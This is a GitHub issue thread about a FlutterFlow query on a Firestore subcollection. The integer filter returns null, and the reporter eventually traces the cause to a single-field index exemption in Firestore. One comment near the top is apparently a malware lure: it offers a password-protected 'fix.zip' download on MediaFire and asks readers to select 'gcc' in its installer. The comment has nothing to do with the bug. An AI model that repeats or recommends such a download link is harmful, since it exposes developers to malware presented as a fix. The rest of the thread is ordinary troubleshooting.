### ISSUE TITLE
Query Collection by Filter Error

### ISSUE THREAD

**Issue by CeNtAuRoO** [FlutterFlow/flutterflow-issues#3691]
### Can we access your project?

- [X] I give permission for members of the FlutterFlow team to access and test my project for the sole purpose of investigating this issue.

### Current Behavior

I have a Firebase subcollection with an Integer variable and a list of DateTime. I want to query in an action one of those subcollections filtering by the first variable (Integer). I have the main collection reference, and I put correctly the filter, but when I enter the Test Mode no subcollection with that filter is found. When I remove the filter it takes the first subcollection so the query works; the problem is that the filter doesnt work correctly, I dont know why because its just comparing two Integer.

### Expected Behavior

When I query an existing subcollection by a filter that compares Integer, it should return the subcollection that contain that filter, but it return a null value (The subcollection exist and the filter is correct, it compares two Integer).

### Steps to Reproduce

1. Create an action in the 'Action Flow Editor' of a Calendar
2. Choose Query a collection and choose a subcollection
3. Put the reference of the main collection
4. Put a filter and create an action output variable name
5. Go Test Mode and see that it returns 'null'

### Reproducible from Blank

- [ ] The steps to reproduce above start from a blank project.

### Bug Report Code (Required)

ITFfiPLluIh2rsdD0a6IKfpaiWEsH2kcTIAziu1udw0jCJznBqQuY8neR1pDUte5aVNcPGCKmnwxw+j5jvH9CPcEGxeYY6pa/rlyZArke2iRR6q2C5O7dWhBI/5bIXKb16ujvApDOsFpLlVn31yuHvCXHynDIuu/Zwh9f6PHaOI=

### Visual documentation

FlutterFlow:

![Captura de pantalla 2024-08-26 161206](https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/849dfa06-6999-4e8c-8a6a-26fbb61f5f6c/8e15f94c-3388-4bdc-8c6e-711d1276b3aa?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS84NDlkZmEwNi02OTk5LTRlOGMtOGE2YS0yNmZiYjYxZjVmNmMvOGUxNWY5NGMtMzM4OC00YmRjLThjNmUtNzExZDEyNzZiM2FhIiwiaWF0IjoxNzI1MzY0MjY2LCJleHAiOjMzMjk1OTI0MjY2fQ._l29b1Jk4mtGh1ZSF-PEf10m4A6DXhq20qfQ0jR5ul0)

![Captura de pantalla 2024-08-26 161216](https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/79662bf5-4c48-4c3c-b72f-0d0d711f0aa3/fc8dabb3-0bc9-44a0-b143-afb8169f7b6e?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS83OTY2MmJmNS00YzQ4LTRjM2MtYjcyZi0wZDBkNzExZjBhYTMvZmM4ZGFiYjMtMGJjOS00NGEwLWIxNDMtYWZiODE2OWY3YjZlIiwiaWF0IjoxNzI1MzY0MjY2LCJleHAiOjMzMjk1OTI0MjY2fQ.JsLl80VwYfqksjqztBgJRRWCT2RPAYydwOYhNeWZ084)

![Captura de pantalla 2024-08-26 161227](https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/c5acb1f0-123c-49ee-8add-b1c269da2c38/bf7a640d-f6e7-4996-b91d-3a23c8898e7b?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS9jNWFjYjFmMC0xMjNjLTQ5ZWUtOGFkZC1iMWMyNjlkYTJjMzgvYmY3YTY0MGQtZjZlNy00OTk2LWI5MWQtM2EyM2M4ODk4ZTdiIiwiaWF0IjoxNzI1MzY0MjY2LCJleHAiOjMzMjk1OTI0MjY2fQ.qcE4aT_UZBbK2YRdYnSrvIM8GDyfW93D13nTHFl1qsI)

![Captura de pantalla 2024-08-26 161240](https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/6d471fc4-e41b-449f-8666-c8eaf352d88c/47ff6db5-5fc8-44de-bbee-2f346300c804?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS82ZDQ3MWZjNC1lNDFiLTQ0OWYtODY2Ni1jOGVhZjM1MmQ4OGMvNDdmZjZkYjUtNWZjOC00NGRlLWJiZWUtMmYzNDYzMDBjODA0IiwiaWF0IjoxNzI1MzY0MjY2LCJleHAiOjMzMjk1OTI0MjY2fQ.QT5I0eT5GBYAvaehfRx0Oiz6xbWsnfFWyVErw2-pSuU)

![Captura de pantalla 2024-08-26 161244](https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/9db0b05d-d58d-4dd2-a7e6-0878b4172644/382bc06c-9bf5-459f-853a-0e514f188072?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS85ZGIwYjA1ZC1kNThkLTRkZDItYTdlNi0wODc4YjQxNzI2NDQvMzgyYmMwNmMtOWJmNS00NTlmLTg1M2EtMGU1MTRmMTg4MDcyIiwiaWF0IjoxNzI1MzY0MjY2LCJleHAiOjMzMjk1OTI0MjY2fQ.IfRrc0Oqs9EUn9LnWs6VxKQiZduBskjqjE4EZCs_1a8)

Collections and Firebase:

![Captura de pantalla 2024-08-26 161312](https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/ac1c40ac-e6a5-41e4-b2e2-c6637cdbae4b/292c0098-63cb-4be2-99f7-965df698b91d?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS9hYzFjNDBhYy1lNmE1LTQxZTQtYjJlMi1jNjYzN2NkYmFlNGIvMjkyYzAwOTgtNjNjYi00YmUyLTk5ZjctOTY1ZGY2OThiOTFkIiwiaWF0IjoxNzI1MzY0MjY2LCJleHAiOjMzMjk1OTI0MjY2fQ.KZXGN1zMLjPmCNu5kwfkO1IgNIJ_LeSps-z7EJsytVI)

![Captura de pantalla 2024-08-26 161318](https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/1981494e-5864-4387-ad14-c409daa20c9e/4a4ab25c-f75b-4101-b92b-89ffbe0577a9?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS8xOTgxNDk0ZS01ODY0LTQzODctYWQxNC1jNDA5ZGFhMjBjOWUvNGE0YWIyNWMtZjc1Yi00MTAxLWI5MmItODlmZmJlMDU3N2E5IiwiaWF0IjoxNzI1MzY0MjY2LCJleHAiOjMzMjk1OTI0MjY2fQ.Q4EXMjjt38xJYjbIkJDWKNo_hbbOr7iaexMlLQkoLY8)

![Captura de pantalla 2024-08-26 161333](https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/9582a511-7f21-4358-be5a-c923d8b00392/a318808d-a8c9-4004-afc8-3682c3e8fd88?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS85NTgyYTUxMS03ZjIxLTQzNTgtYmU1YS1jOTIzZDhiMDAzOTIvYTMxODgwOGQtYThjOS00MDA0LWFmYzgtMzY4MmMzZThmZDg4IiwiaWF0IjoxNzI1MzY0MjY2LCJleHAiOjMzMjk1OTI0MjY2fQ.L7ZntbBCC2mMjsahRbWslQz-cjpL5Yqv3K4V6msbdMA)

### Environment

```markdown
- FlutterFlow version: v4.1.83+
- Platform: Web
- Browser name and version: Chrome 128.0.6613.85
- Operating system and version affected: Windows 10
```

### Additional Information

I want to show a list of hours based on the day the user choose in a calendar. So I have different subcollections with an Integer (day) and a list of DateTime (hours), but when I try to filter those subcollections by the day, it doesnt work, it doesnt found anything but it existHi @CeNtAuRoO!

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paulperez-dev** [comment]
Hi @CeNtAuRoO! The bug report code does not include the query and the filter is not applied in the captures you shared. Can you please reproduce the issue and then generate the bug report code again (in that order)?

**Comment by CeNtAuRoO** [comment]
> Hi @CeNtAuRoO! The bug report code does not include the query and the filter is not applied in the captures you shared. Can you please reproduce the issue and then generate the bug report code again (in that order)?

https://github.com/user-attachments/assets/9896277d-9c1c-452c-a220-1fbe238fd231

https://github.com/user-attachments/assets/aa049a38-5c82-4a3f-a83f-a5cba87169a5

https://github.com/user-attachments/assets/fb4c0f79-60ea-4cc2-bfa0-faace45d11f2

https://github.com/user-attachments/assets/10ebe9e8-973b-4025-b75e-3a3a0b59ebca

Bug report of 'Calendar' widget with the query action: ITFfiPLluIh2rsdD0a6IKfpaiWEsH2kcTIAziu1udw0jCJznBqQuY8neR1pDUte5aVNcOVKgjj0xpM7NitnxA8IEYA2qfoBD/qhucg30e2iRR6q2C5O7dWhBI/5bIXKb16ujvApDOsFpLlVn31yuHvCXHynDIuu/Zwh9f6PHaOI=


I dont know if Im making an error in any step or its just a filter error. Thanks for your help!

**Comment by paulperez-dev** [comment]
Hi @CeNtAuRoO! The query seems OK to me. Can you please add another value to the row to show the day (with no filter) or collapse the following option and share a capture? 

<img src="https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/6cc0e746-1dfa-42c3-8968-4dd8d483811c/1a951594-4a2a-447c-ad26-382478f3fbea?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS82Y2MwZTc0Ni0xZGZhLTQyYzMtODk2OC00ZGQ4ZDQ4MzgxMWMvMWE5NTE1OTQtNGEyYS00NDdjLWFkMjYtMzgyNDc4ZjNmYmVhIiwiaWF0IjoxNzI0ODc2NzcyLCJleHAiOjMzMjk1NDM2NzcyfQ.6_fVC_1Z17iFRoRg3a5pKlE-kZe0svudx7RprLw8_l8 " alt="image.png" width="926" height="505" />

Things I think can help to identify the error:

1. verify the data shown correspond to the first document.
2. change the query to return the count of elements (how the value change with and without the filter).
3. filter by another day
4. change the filter condition to 'greater than' or any other (to verify if the filter can return data).

**Comment by CeNtAuRoO** [comment]
I tried all that, it seems to always return null when I put a filter

https://github.com/user-attachments/assets/6afe2352-607e-4d11-9414-30a52b7592fd

**Comment by paulperez-dev** [comment]
Hi @CeNtAuRoO! Thanks for the video evidence! Let me look into this.

**Comment by CeNtAuRoO** [comment]
Hey, I have already fixed the error and it works fine for me rn. So, i dont know why, but in FireBase, in the Firestore Database>Indexes, at 'single field', the 'day' variable from the 'availableSchedule' collection had been automatically set as an exception, so indexes were not created automatically, and I guess that's why it didn't work fine when filtering based on that variable. Thanks for your help and sorry for wasting your time.

**Comment by paulperez-dev** [comment]
No worries @CeNtAuRoO! Thanks to you for the update.
